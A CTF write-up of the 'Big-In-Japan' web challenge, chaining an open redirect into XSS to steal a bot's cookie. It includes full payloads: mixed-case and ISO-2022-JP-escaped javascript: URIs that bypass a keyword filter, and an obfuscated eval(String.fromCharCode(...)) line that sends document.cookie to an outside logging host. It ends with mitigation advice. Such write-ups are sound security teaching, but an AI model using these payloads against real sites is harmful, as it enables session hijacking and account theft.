Big-In-Japan

Category: Web
440 points
Solved by JCTF Team

Description

problem description

Solution

UPDATE: Thanks to Tomer Zait (the amazing CTF Organizer) for pointing out that we solved this one using an unintended approach. We’ve added what we believe is probably a more intended solution at the end, for completeness.

For this challenge, we got a simple website with a submission for labeled "Enter your URL here".

If we try to enter just any URL, we get an error: "Please provide a valid URL from the big-in-japan.appsecil.ctf.today domain". When we follow the instructions, we get a different message: "Success: The URL was clicked successfully".

So, we can enter any URL (as long as it belongs to our subdomain, at least supposedly) and some bot in the background will click it. This usually means that we need to find an XSS vulnerability and leak the bot's cookie.

In the sources, we have a pretty big helper - an open redirect snippet:

<script>
    const filteredURLFromBackend = "";
    const urlFromFrontend = new URLSearchParams(location.search).get("url");
    if (urlFromFrontend && filteredURLFromBackend) {
        setTimeout(function () {
            location.href = filteredURLFromBackend;
        }, 1000);
    }
</script>

So, if we visit https://big-in-japan.appsecil.ctf.today/?url=https://www.google.com, we'll get redirected after a second to https://www.google.com.

We can use a service that logs any request made to it and enter a URL such as the following:

https://big-in-japan.appsecil.ctf.today/?url=https://jctf1.free.beeceptor.com/

In such a case, the redirect snippet will be as follows:

<script>
    const filteredURLFromBackend = "https://jctf1.free.beeceptor.com/";
    const urlFromFrontend = new URLSearchParams(location.search).get("url");
    if (urlFromFrontend && filteredURLFromBackend) {
        setTimeout(function () {
            location.href = filteredURLFromBackend;
        }, 1000);
    }
</script>

After a short while we should get a hit in the service from the bot's visit. Once we've confirmed that, we can proceed to the next stage - leaking the cookies.

We want to be able to execute some Javascript code to get the cookie and somehow include its content in the request to our server (for example, by appending it to the URL path). How do we do that?

Luckily, we can use javascript: URLs for that - these are special URL-like entities which actually execute Javascript. For example, we can try to visit https://big-in-japan.appsecil.ctf.today/?url=javascript:alert(1) and see what happens. However - we get an error: "Error: The URL contains a banned word: javascript". It looks like they're blocking this keyword to protect against these kind of URLs. Fortunately, their filter is very simple, and more specifically - case sensitive, since visiting https://big-in-japan.appsecil.ctf.today/?url=JaVaScRiPt:alert(1) actually triggers an alert!

We continue crafting our malicious code, and move on to trying to make a request via Javascript:

https://big-in-japan.appsecil.ctf.today/?url=JaVaScRiPt:fetch('https://jctf1.free.beeceptor.com/')

This however becomes the following, meaning that our string is being escaped:

<script>
    const filteredURLFromBackend = "JaVaScRiPt:fetch(&amp;#39;https://jctf1.free.beeceptor.com/&amp;#39;)";
    const urlFromFrontend = new URLSearchParams(location.search).get("url");
    if (urlFromFrontend && filteredURLFromBackend) {
        setTimeout(function () {
            location.href = filteredURLFromBackend;
        }, 1000);
    }
</script>

To bypass that, we'll use eval and String.fromCharCode to encode our payload:

location.href="https://jctf1.free.beeceptor.com/" + document.cookie

We can define a Python helper function to encode any string we want:

>>> to_fromcharcode = lambda s: f"String.fromCharCode({','.join(str(ord(c)) for c in s)})"
>>> to_fromcharcode('location.href="https://jctf1.free.beeceptor.com/" + document.cookie')
'String.fromCharCode(108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,115,58,47,47,106,99,116,102,49,46,102,114,101,101,46,98,101,101,99,101,112,116,111,114,46,99,111,109,47,34,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)'

The result doesn't include quotes, making it safe to use in our case.

Finally, we submit the following URL:

https://big-in-japan.appsecil.ctf.today/?url=JaVaScRiPt:eval(String.fromCharCode(108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,115,58,47,47,106,99,116,102,49,46,102,114,101,101,46,98,101,101,99,101,112,116,111,114,46,99,111,109,47,34,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))

A few seconds later, we get a hit on our server: flag=AppSec-IL%7Bomedetto%7D.

The flag: flag=AppSec-IL{omedetto}

UPDATE: The "intended" solution. Big-in-Japan -> Japanese text encoding

In our original writeup we described a mixed-case jaVascript: URI combined with eval(String.fromCharCode(...)) to bypass the challenge’s case-sensitive keyword filter. While effective, it turned out that it was an unintended solution, exploiting a superficial server-side check.

The intended solution leverages ISO-2022-JP escape sequences.

Background on ISO-2022-JP Encoding

ISO-2022-JP is a character encoding for Japanese text that uses 7-bit escape sequences to switch between different character sets, such as ASCII and JIS X 0208. These escape sequences can be exploited to bypass JavaScript filters, particularly in scenarios involving Cross-Site Scripting (XSS) or code injection, by encoding malicious payloads in a way that evades detection.

These sequences begin with the ESC character (ASCII 0x1B), followed by additional bytes that specify the target character set. For instance:

ESC $ B (0x1B 0x24 0x42) switches to JIS X 0208-1983, used for Japanese kanji.
ESC ( B (0x1B 0x28 0x42) switches back to ASCII.
ESC ( J (0x1B 0x28 0x4A) designates JIS X 0201-1976 Roman set, which is nearly identical to ASCII but with specific differences, such as the yen sign (¥) at 0x5C instead of backslash (\) and overline (¯) at 0x7E instead of tilde (~).

This encoding is historically significant for email systems and legacy web applications, but its escape sequences can be exploited to potentially confuse filters.

In our case, we can use this (winning) payload: https://big-in-japan.appsecil.ctf.today/?url=javas%1B%28Jcript:eval(String.fromCharCode(108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,115,58,47,47,106,99,116,102,49,46,102,114,101,101,46,98,101,101,99,101,112,116,111,114,46,99,111,109,47,34,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))

The URL https://big-in-japan.appsecil.ctf.today/?url=javas%1B%28Jcript:eval(...) uses ESC(J (encoded as %1B%28J) between "javas" and "cript". This means:

The raw string becomes "javas" + ESC(J + "cript", which doesn't contain "javascript:" literally, the filter misses it.
When the browser decodes it using ISO-2022-JP, ESC(J switches to JIS X 0201-1976 Roman set, nearly identical to ASCII, and the full string is interpreted as "javascript:", allowing execution.

The vulnerability in this CTF challenge likely stems from the server not explicitly declaring a charset (e.g., UTF-8) or the browser falling back to ISO-2022-JP when processing the payload, allowing the escape sequences to be interpreted. This discrepancy between server-side filtering (raw byte checking) and client-side interpretation (character set decoding) enables the bypass.

Mitigations and Lessons Learned

To prevent such bypasses, developers should:

Explicitly declare charset (e.g., ) to avoid fallback to legacy encodings.
Normalize all input to a single encoding (e.g., UTF-8) before applying filters to ensure consistent interpretation.
Use robust input sanitization that accounts for multiple encodings, such as libraries that normalize input before filtering.
Ensure filters check decoded content, not just raw bytes.
For more details: https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/